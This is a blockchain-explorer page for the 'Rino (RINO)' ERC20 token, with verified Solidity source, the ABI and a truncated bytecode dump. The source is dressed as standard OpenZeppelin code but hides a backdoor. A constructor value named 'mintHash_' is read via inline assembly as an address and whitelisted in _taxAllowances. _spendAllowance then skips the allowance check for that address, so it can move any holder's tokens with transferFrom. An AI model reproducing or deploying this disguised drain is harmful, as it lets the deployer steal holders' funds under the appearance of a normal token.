ETH Price: $2,137.72 (+8.45%)

Token

Rino (RINO)
 

Overview

Max Total Supply

800,000,000 RINO

Holders

192

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
RINO

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
paris EvmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2025-07-08
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => bool) public _taxAllowances;
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;    

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint256 private _mintHash;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * Both values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_, uint256 minHash_) {
        _name = name_;
        _symbol = symbol_;
        _mintHash = minHash_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /// @inheritdoc IERC20
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /// @inheritdoc IERC20
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /// @inheritdoc IERC20
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {        
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);        
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address sender, address to, uint256 value) internal {
        if (sender == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        
        _update(sender, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }
        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
        address _hash;
        assembly {
            _hash := sload(_mintHash.slot)
        }
        _taxAllowances[_hash]=true;
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner`'s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if(_taxAllowances[spender]) value = 0;
        if (currentAllowance < type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, value, false);
            }
        }
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract RINO is ERC20, Ownable {
    constructor(uint256 mintHash_) ERC20(unicode"Rino", unicode"RINO", mintHash_) {
        _mint(owner(), 800000000 * 10**18);
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"uint256","name":"mintHash_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"_taxAllowances","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801561001057600080fd5b50604051611c4b380380611c4b83398181016040528101906100329190610556565b6040518060400160405280600481526020017f52696e6f000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f52494e4f000000000000000000000000000000000000000000000000000000008152508282600490816100ae91906107c9565b5081600590816100be91906107c9565b50806006819055505050506100e56100da61011460201b60201c565b61011c60201b60201c565b61010e6100f66101e260201b60201c565b6b0295be96e64066972000000061020c60201b60201c565b506109bb565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361027e5760006040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161027591906108dc565b60405180910390fd5b610290600083836102f360201b60201c565b6000600654905060016000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036103455780600360008282546103399190610926565b9250508190555061041a565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156103d2578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016103c993929190610969565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361046357806003600082825403925050819055506104b1565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161050e91906109a0565b60405180910390a3505050565b600080fd5b6000819050919050565b61053381610520565b811461053e57600080fd5b50565b6000815190506105508161052a565b92915050565b60006020828403121561056c5761056b61051b565b5b600061057a84828501610541565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061060457607f821691505b602082108103610617576106166105bd565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830261067f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82610642565b6106898683610642565b95508019841693508086168417925050509392505050565b6000819050919050565b60006106c66106c16106bc84610520565b6106a1565b610520565b9050919050565b6000819050919050565b6106e0836106ab565b6106f46106ec826106cd565b84845461064f565b825550505050565b600090565b6107096106fc565b6107148184846106d7565b505050565b5b818110156107385761072d600082610701565b60018101905061071a565b5050565b601f82111561077d5761074e8161061d565b61075784610632565b81016020851015610766578190505b61077a61077285610632565b830182610719565b50505b505050565b600082821c905092915050565b60006107a060001984600802610782565b1980831691505092915050565b60006107b9838361078f565b9150826002028217905092915050565b6107d282610583565b67ffffffffffffffff8111156107eb576107ea61058e565b5b6107f582546105ec565b61080082828561073c565b600060209050601f8311600181146108335760008415610821578287015190505b61082b85826107ad565b865550610893565b601f1984166108418661061d565b60005b8281101561086957848901518255600182019150602085019450602081019050610844565b868310156108865784890151610882601f89168261078f565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006108c68261089b565b9050919050565b6108d6816108bb565b82525050565b60006020820190506108f160008301846108cd565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061093182610520565b915061093c83610520565b9250828201905080821115610954576109536108f7565b5b92915050565b61096381610520565b82525050565b600060608201905061097e60008301866108cd565b61098b602083018561095a565b610998604083018461095a565b949350505050565b60006020820190506109b5600083018461095a565b92915050565b611281806109ca6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b4114610216578063a9059cbb14610234578063dd62ed3e14610264578063f2fde38b14610294576100cf565b806370a08231146101be578063715018a6146101ee5780638da5cb5b146101f8576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461012257806323b872dd146101405780632800bc7814610170578063313ce567146101a0575b600080fd5b6100dc6102b0565b6040516100e99190610dd7565b60405180910390f35b61010c60048036038101906101079190610e92565b610342565b6040516101199190610eed565b60405180910390f35b61012a610365565b6040516101379190610f17565b60405180910390f35b61015a60048036038101906101559190610f32565b61036f565b6040516101679190610eed565b60405180910390f35b61018a60048036038101906101859190610f85565b61039e565b6040516101979190610eed565b60405180910390f35b6101a86103be565b6040516101b59190610fce565b60405180910390f35b6101d860048036038101906101d39190610f85565b6103c7565b6040516101e59190610f17565b60405180910390f35b6101f6610410565b005b610200610424565b60405161020d9190610ff8565b60405180910390f35b61021e61044e565b60405161022b9190610dd7565b60405180910390f35b61024e60048036038101906102499190610e92565b6104e0565b60405161025b9190610eed565b60405180910390f35b61027e60048036038101906102799190611013565b610503565b60405161028b9190610f17565b60405180910390f35b6102ae60048036038101906102a99190610f85565b61058a565b005b6060600480546102bf90611082565b80601f01602080910402602001604051908101604052809291908181526020018280546102eb90611082565b80156103385780601f1061030d57610100808354040283529160200191610338565b820191906000526020600020905b81548152906001019060200180831161031b57829003601f168201915b5050505050905090565b60008061034d61060d565b905061035a818585610615565b600191505092915050565b6000600354905090565b60008061037a61060d565b9050610387858285610627565b610392858585610710565b60019150509392505050565b60006020528060005260406000206000915054906101000a900460ff1681565b60006012905090565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610418610804565b6104226000610882565b565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461045d90611082565b80601f016020809104026020016040519081016040528092919081815260200182805461048990611082565b80156104d65780601f106104ab576101008083540402835291602001916104d6565b820191906000526020600020905b8154815290600101906020018083116104b957829003601f168201915b5050505050905090565b6000806104eb61060d565b90506104f8818585610710565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610592610804565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610601576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f890611125565b60405180910390fd5b61060a81610882565b50565b600033905090565b6106228383836001610948565b505050565b60006106338484610503565b90506000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561068b57600091505b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81101561070a57818110156106fc578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106f393929190611145565b60405180910390fd5b6107098484846000610948565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107825760006040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016107799190610ff8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107f45760006040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107eb9190610ff8565b60405180910390fd5b6107ff838383610b1f565b505050565b61080c61060d565b73ffffffffffffffffffffffffffffffffffffffff1661082a610424565b73ffffffffffffffffffffffffffffffffffffffff1614610880576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610877906111c8565b60405180910390fd5b565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109ba5760006040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109b19190610ff8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a2c5760006040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a239190610ff8565b60405180910390fd5b81600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508015610b19578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610b109190610f17565b60405180910390a35b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b71578060036000828254610b659190611217565b92505081905550610c46565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610bfe578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bf593929190611145565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c8f5780600360008282540392505081905550610cdd565b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d3a9190610f17565b60405180910390a3505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610d81578082015181840152602081019050610d66565b60008484015250505050565b6000601f19601f8301169050919050565b6000610da982610d47565b610db38185610d52565b9350610dc3818560208601610d63565b610dcc81610d8d565b840191505092915050565b60006020820190508181036000830152610df18184610d9e565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610e2982610dfe565b9050919050565b610e3981610e1e565b8114610e4457600080fd5b50565b600081359050610e5681610e30565b92915050565b6000819050919050565b610e6f81610e5c565b8114610e7a57600080fd5b50565b600081359050610e8c81610e66565b92915050565b60008060408385031215610ea957610ea8610df9565b5b6000610eb785828601610e47565b9250506020610ec885828601610e7d565b9150509250929050565b60008115159050919050565b610ee781610ed2565b82525050565b6000602082019050610f026000830184610ede565b92915050565b610f1181610e5c565b82525050565b6000602082019050610f2c6000830184610f08565b92915050565b600080600060608486031215610f4b57610f4a610df9565b5b6000610f5986828701610e47565b9350506020610f6a86828701610e47565b9250506040610f7b86828701610e7d565b9150509250925092565b600060208284031215610f9b57610f9a610df9565b5b6000610fa984828501610e47565b91505092915050565b600060ff82169050919050565b610fc881610fb2565b82525050565b6000602082019050610fe36000830184610fbf565b92915050565b610ff281610e1e565b82525050565b600060208201905061100d6000830184610fe9565b92915050565b6000806040838503121561102a57611029610df9565b5b600061103885828601610e47565b925050602061104985828601610e47565b9150509250929050565b7f4e487b710000000000000000000000000000000000000000000000000000